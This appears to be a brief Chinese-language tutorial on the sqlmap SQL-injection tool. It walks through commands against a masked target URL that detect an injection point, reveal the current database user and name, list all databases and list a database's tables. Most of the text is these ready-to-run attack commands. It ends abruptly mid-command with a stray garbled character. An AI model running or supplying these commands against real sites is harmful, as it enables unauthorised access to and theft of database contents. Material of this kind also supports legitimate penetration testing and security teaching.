sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。
一、检测注入点是否可以利用
C:\Python27\sqlmap>python sqlmap.py -u "http://xxxxxx/products.asp?id=56"
参数:
-u:指定注入点url,注意带入注入点
如果成功,那么会显示数据库版本注入类型等信息
二、爆出数据库数据
python sqlmap.py -u "http://xxxxxx/products.asp?id=56" --user
这表命令可以爆出数据库当前用户
python sqlmap.py -u "http://xxxxxx/products.asp?id=56"--current-db
这条命令可以爆出当前数据库名
--current :意思当前正在使用的
下面进行逐步爆破
1.列出所有数据库
python sqlmap.py -u "http://xxxxxx/products.asp?id=56"--dbs
--db:所有数据库
2.列出指定数据库所有表
python sqlmap.py -u "http://xxxxxx/products.asp?id=56"-D currdb --tables
-Dÿ